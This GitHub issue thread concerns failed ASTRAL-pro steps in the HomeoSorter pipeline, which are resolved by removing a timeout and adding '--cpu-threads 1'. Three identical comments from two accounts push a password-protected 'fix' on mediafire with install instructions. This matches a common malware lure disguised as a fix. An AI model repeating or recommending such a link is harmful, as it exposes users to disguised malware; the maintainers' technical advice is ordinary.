### ISSUE TITLE
Some ASTRALs at step "3_astral" did not finish successfully, and the whole pipeline as well

### ISSUE THREAD

**Issue by MarekSlenker** [ChenRen-SCBG/HomeoSorter#1]
Some ASTRALs at step "3_astral" did not finish successfully, and the whole pipeline as well. The astral logs are just truncated, and the files are empty. Input data and results are attached. Could you take a look at it?
[job_4003155.tar.gz](https://github.com/user-attachments/files/16823700/job_4003155.tar.gz)
When you download the attached file, rename it to tar.bz2. It's a BZ2 archive, but I had to rename it because only GZ files are allowed.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ChenRen-SCBG** [comment]
Hi Merek,
During our tests, we noticed that a few ASTRAL-pro analyses might occasionally get stuck indefinitely, likely due to unknown bugs in ASTRAL-pro. To address this, we set a limit of 200 seconds for each ASTRAL analysis (see line 357 in the HomeoSorter script: "p.wait(timeout=200)"). If the analysis exceeds this limit, it will be terminated, and the failed analyses will be logged in the "*.analyses_failed" files located within the folders of the corresponding polyploids under the "3_astral" directory.

In your case, however, the issue arises just because more time is needed to complete the ASTRAL analyses for larger datasets. You can increase the time limit (i.e., p.wait(timeout=200)) by either raising the "200" to a larger nubmer or setting it to "None." I resumed your analyses from substep 4 and successfully completed the entire process after removing the time restriction.

Please let me know if the issue persists.

**Comment by MarekSlenker** [comment]
Dear Chen, I changed p.wait(timeout=200)) to p.wait(timeout=None)), but moreover, I had to add "--cpu-threads 1" to row 352.

The HomeoSorter runs ASTRAL-pro using multiple threads, and each ASTRAL-pro uses multiple threads as well, which leads to errors. After setting "--cpu-threads 1",  HomeoSorter finished successfully, even for larger datasets.

Will you update the homeosorter.py script, please? Or should I make those changes?

**Comment by ChenRen-SCBG** [comment]
Hi Marek,

It is indeed safer to include the "--cpu-threads 1" flag for ASTRAL-pro analyses. We have updated the script based on your suggestion—thanks for pointing it out. Please feel free to further modify the script as needed for your specific case.

Best regards,
